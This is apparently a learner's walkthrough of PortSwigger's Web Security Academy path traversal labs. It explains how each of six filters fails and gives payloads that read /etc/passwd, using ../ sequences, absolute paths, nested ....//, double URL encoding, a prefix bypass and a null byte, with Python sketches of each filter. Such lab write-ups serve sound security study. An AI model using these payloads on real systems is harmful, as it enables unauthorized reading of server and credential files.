Path traversal module - Web Security Academy - PortSwigger
Definition
Path traversal (also known as directory traversal) is a vulnerability that enables an attacker to read arbitrary files on the server that is running an application.
In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server.
Reading arbitrary files via path traversal
Imagine a shopping application that displays images of items for sale. This might load an image using the following HTML:
<img src="/loadImage?filename=218.png">
The loadImage URL takes a filename parameter and returns the contents of the specified file.
The image files are stored on disk in the location /var/www/images/. To return an image, the application appends the requested filename to this base directory and uses a filesystem API to read the contents of the file. In other words, the application reads from the following file path:
/var/www/images/218.png
This application implements no defenses against path traversal attacks. As a result, an attacker can request the following URL to retrieve the /etc/passwd file from the server’s filesystem:
https://testing-website.com/loadImage?filename=../../../etc/passwd
This causes the application to read from the following file path:
/var/www/images/../../../etc/passwd
The sequence ../ is valid within a file path, and means to step up one level in the directory structure. The three consecutive ../ sequences step up from /var/www/images/ to the filesystem root, and so the file that is actually read is:
/etc/passwd
On Unix-based operating systems, this is a standard file containing details of the users that are registered on the server, but an attacker could retrieve other arbitrary files using the same technique.
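The path resolution described above can be checked with a few lines of Python. This is only a minimal sketch, not the application's real code: the function name build_path is hypothetical, and posixpath is used so that the result is the same on any platform.

```python
import posixpath

BASE_DIR = "/var/www/images/"  # base directory from the example above


def build_path(filename: str) -> str:
    """Hypothetical vulnerable logic: append user input to the base directory."""
    return BASE_DIR + filename


raw = build_path("../../../etc/passwd")
print(raw)                      # /var/www/images/../../../etc/passwd
print(posixpath.normpath(raw))  # /etc/passwd
```

normpath only collapses the ../ segments as text. The operating system performs the equivalent resolution itself when the unnormalized path is opened.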
On Windows, both ../ and ..\ are valid directory traversal sequences. The following is an example of an equivalent attack against a Windows-based server:
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
LAB 1: Simple case of File path traversal
This lab contains a path traversal vulnerability in the display of product images.
The task is to retrieve the contents of the /etc/passwd file by exploiting this vulnerability.
Enable Images in the History filter so that the image-loading requests appear in the request history.
The image requests carry a filename parameter, which is the likely injection point for path traversal.
Let’s send one of the requests containing the filename parameter to the Repeater.
We can see that this GET request fetches a file from a folder named image. I don’t know exactly where this folder is located in the filesystem, so I have to keep adding ../ until the path reaches the root.
If the path is incorrect, the application will return an error message: “No such file”.
Once the path is correct, the server returns the contents of /etc/passwd. The LAB is solved!
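The trial-and-error step is easy to script. The sketch below only builds the candidate values for the filename parameter; sending them (for example through the Repeater) is left out. The function name and the default maximum depth are my own assumptions.

```python
def traversal_candidates(target: str, max_depth: int = 6) -> list[str]:
    """Return payloads that prefix `target` with 1..max_depth "../" sequences."""
    return ["../" * depth + target for depth in range(1, max_depth + 1)]


for payload in traversal_candidates("etc/passwd", max_depth=4):
    print(payload)
```

On Unix-like systems the parent of the root directory is the root itself, so using more ../ sequences than needed normally does no harm.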
Common obstacles to exploiting path traversal vulnerabilities
Many applications that place user input into file paths implement defenses against path traversal attacks. These can often be bypassed.
If an application strips or blocks directory traversal sequences from the user-supplied filename, it might be possible to bypass the defense using a variety of techniques.
We might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.
Moreover, we might be able to use nested traversal sequences, such as ....// or ....\/. These revert to simple traversal sequences when the inner sequence is stripped.
In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters. This results in %2e%2e%2f and %252e%252e%252f respectively. Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also work.
An application may require the user-supplied filename to start with the expected base folder, such as /var/www/images. In this case, it might be possible to include the required base folder followed by suitable traversal sequences. For example: filename=/var/www/images/../../../etc/passwd.
An application may require the user-supplied filename to end with an expected file extension, such as .png. In this case, it might be possible to use a null byte to effectively terminate the file path before the required extension. For example: filename=../../../etc/passwd%00.png.
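To see where the encoded forms mentioned above come from, here is a small Python sketch. It only reproduces the encodings; whether a given server actually decodes them back into a slash depends on the server, which is an assumption I cannot verify here.

```python
import unicodedata
from urllib.parse import quote, unquote

# Percent-encode every character of "../", including the dots.
single = "".join(f"%{ord(ch):02x}" for ch in "../")
# Encoding the result again turns each "%" into "%25".
double = quote(single, safe="")
print(single)  # %2e%2e%2f
print(double)  # %252e%252e%252f

# %ef%bc%8f is the UTF-8 encoding of U+FF0F (fullwidth solidus), which
# compatibility normalization (NFKC) folds into an ordinary "/".
fullwidth = unquote("%ef%bc%8f")
print(fullwidth == "\uff0f")                            # True
print(unicodedata.normalize("NFKC", fullwidth) == "/")  # True

# %c0%af is an overlong (invalid) UTF-8 encoding of "/". A strict decoder
# such as Python's rejects it; a lenient decoder might map it to "/".
try:
    bytes.fromhex("c0af").decode("utf-8")
    overlong_accepted = True
except UnicodeDecodeError:
    overlong_accepted = False
print(overlong_accepted)  # False
```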
LAB 2: File path traversal, traversal sequences blocked with absolute path bypass
This lab contains a path traversal vulnerability in the display of product images. The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory. To solve the lab, retrieve the contents of the /etc/passwd file.
First, enable Images in the History filter to see the image-loading requests, as in the previous LAB.
The lab description hints that this website blocks traversal sequences such as ../ but allows absolute paths. So I only need to change the value of the filename parameter to /etc/passwd.
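One plausible reason an absolute path gets through is the way path-joining helpers treat absolute components. The sketch below is an assumption about how such an application could be written, not the lab's real code; is_blocked and resolve are hypothetical names.

```python
import posixpath

BASE_DIR = "/var/www/images"  # assumed default working directory


def is_blocked(filename: str) -> bool:
    """Hypothetical filter: reject input that contains a traversal sequence."""
    return "../" in filename or "..\\" in filename


def resolve(filename: str) -> str:
    # posixpath.join discards earlier components when a later one is absolute.
    return posixpath.join(BASE_DIR, filename)


print(is_blocked("../../../etc/passwd"))  # True
print(is_blocked("/etc/passwd"))          # False
print(resolve("218.png"))                 # /var/www/images/218.png
print(resolve("/etc/passwd"))             # /etc/passwd
```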
LAB 3: File path traversal, traversal sequences stripped non-recursively
This lab contains a path traversal vulnerability in the display of product images. The application strips path traversal sequences from the user-supplied filename before using it. To solve the lab, retrieve the contents of the /etc/passwd file.
First, enable Images in the History filter to see the image-loading requests, as in the previous LAB.
In this LAB, the website strips path traversal sequences such as ../ from the input before using it.
So I try a technique to bypass this filter. In this context, we can use ....// or ....\/ instead of a plain traversal sequence.
A closer look at this technique: the website applies something like a filter that removes suspicious input such as ../. If we nest one ../ inside another, the input becomes ....//. When the filter removes the inner ../, the characters around it join up to form a new ../.
The payload is: ....//....//....//etc/passwd. The LAB is solved!
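The effect of a single-pass filter can be reproduced in Python. This is a sketch of the idea, assuming the filter behaves like one str.replace call; the real filter in the lab is not visible, and both function names are hypothetical.

```python
def strip_once(filename: str) -> str:
    """Hypothetical filter: remove every "../" in one pass, without re-checking."""
    return filename.replace("../", "")


def strip_until_stable(filename: str) -> str:
    """For contrast: repeat the removal until nothing changes."""
    previous = None
    while previous != filename:
        previous, filename = filename, filename.replace("../", "")
    return filename


payload = "....//....//....//etc/passwd"
print(strip_once(payload))          # ../../../etc/passwd
print(strip_until_stable(payload))  # etc/passwd
```

The single-pass version leaves a working traversal sequence behind, while the repeated version does not.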
LAB 4: File path traversal, traversal sequences stripped with superfluous URL-decode
This lab contains a path traversal vulnerability in the display of product images. The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it. To solve the lab, retrieve the contents of the /etc/passwd file.
First, enable Images in the History filter to see the image-loading requests, as in the previous LAB.
According to the lab description, the application URL-decodes the input after checking it for traversal sequences, so I have to submit URL-encoded path traversal sequences.
The URL-encoded form of ../ is ..%2F.
Let’s try the following input: ..%2F..%2F..%2Fetc/passwd.
It returns an error message: “No such file”. Maybe there is more than one decoding stage in the process.
Let’s double-encode the sequence: ../ → ..%2F → ..%252F.
Let’s try again with the following input: ..%252F..%252F..%252Fetc/passwd.
One more note: I don’t need to URL-encode the slash between etc and passwd. The filter only looks for path traversal sequences, and that slash is not part of one, so it can stay unencoded.
The LAB is successfully solved!
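Here is how I picture the two decoding stages, as a Python sketch. The order of operations (decode, check, decode again) is my assumption based on the lab description, and handle and contains_traversal are hypothetical names.

```python
from urllib.parse import unquote


def contains_traversal(value: str) -> bool:
    return "../" in value or "..\\" in value


def handle(raw_value: str) -> str:
    """Hypothetical request handling with a superfluous second URL-decode."""
    decoded_once = unquote(raw_value)  # normal decoding of the query string
    if contains_traversal(decoded_once):
        raise ValueError("No such file")
    return unquote(decoded_once)       # extra decode after the check


try:
    handle("..%2F..%2F..%2Fetc/passwd")
except ValueError as error:
    print("blocked:", error)           # blocked: No such file

print(handle("..%252F..%252F..%252Fetc/passwd"))  # ../../../etc/passwd
```

The single-encoded input is already a plain ../ by the time the check runs, while the double-encoded input only becomes ../ after the check has passed.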
LAB 5: File path traversal, validation of start of path
This lab contains a path traversal vulnerability in the display of product images. The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder. To solve the lab, retrieve the contents of the /etc/passwd file.
First, enable Images in the History filter to see the image-loading requests, as in the previous LAB.
This LAB is a little different from the others. In the default request, the filename parameter no longer holds just the image file’s name. Instead, it holds a full path that starts with /var/www/images.
According to the lab description, the application checks that the supplied path starts with this expected folder.
Try adding ../ sequences after /var/www/images so that the path still starts with the expected folder but then traverses out of it.
The full parameter: filename=/var/www/images/../../../etc/passwd. The LAB is solved!
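The weakness of a prefix check can be shown in a few lines of Python. This sketch assumes the validation is a plain string comparison on the raw input; is_allowed is a hypothetical name, and posixpath keeps the result platform-independent.

```python
import posixpath

REQUIRED_PREFIX = "/var/www/images"  # expected folder from the default request


def is_allowed(path: str) -> bool:
    """Hypothetical validation: only checks how the raw string starts."""
    return path.startswith(REQUIRED_PREFIX)


payload = "/var/www/images/../../../etc/passwd"
print(is_allowed(payload))                      # True
print(posixpath.normpath(payload))              # /etc/passwd
print(is_allowed(posixpath.normpath(payload)))  # False
```

The check passes on the raw string, but the same check on the normalized path would fail, which is why the order of validation and normalization matters.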
LAB 6: File path traversal, validation of file extension with null byte bypass
This lab contains a path traversal vulnerability in the display of product images. The application validates that the supplied filename ends with the expected file extension. To solve the lab, retrieve the contents of the /etc/passwd file.
As mentioned above, some applications require the requested filename to end with an expected file extension.
For example: filename=avatar.png. To retrieve /etc/passwd, we have to make the supplied path end with .png while the file that is actually opened is still /etc/passwd.
So I use a technique called null byte injection: %00.
What is %00? It is the URL-encoded form of the null byte, the character that marks the end of a string in C-style APIs. When a file path containing a null byte reaches such an API, everything after the null byte is ignored.
The input now becomes: filename=../../../etc/passwd%00.png.
By contrast, if the input is only ../../../etc/passwd, the server returns an error message: “No such file”.
The LAB is solved!
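The mismatch between the extension check and the file API can be simulated in Python. This is a sketch under the assumption that the check sees the whole decoded string while the underlying file API stops at the first null byte; both function names are hypothetical.

```python
from urllib.parse import unquote


def has_png_extension(filename: str) -> bool:
    """Hypothetical validation: the decoded value must end with .png."""
    return filename.endswith(".png")


def c_string_view(filename: str) -> str:
    """Simulate a C-style API, which treats the first null byte as end of string."""
    return filename.split("\x00", 1)[0]


decoded = unquote("../../../etc/passwd%00.png")
print(has_png_extension(decoded))                # True
print(c_string_view(decoded))                    # ../../../etc/passwd
print(has_png_extension("../../../etc/passwd"))  # False
```

Python's own open() refuses paths with an embedded null byte, so the truncation is only simulated here.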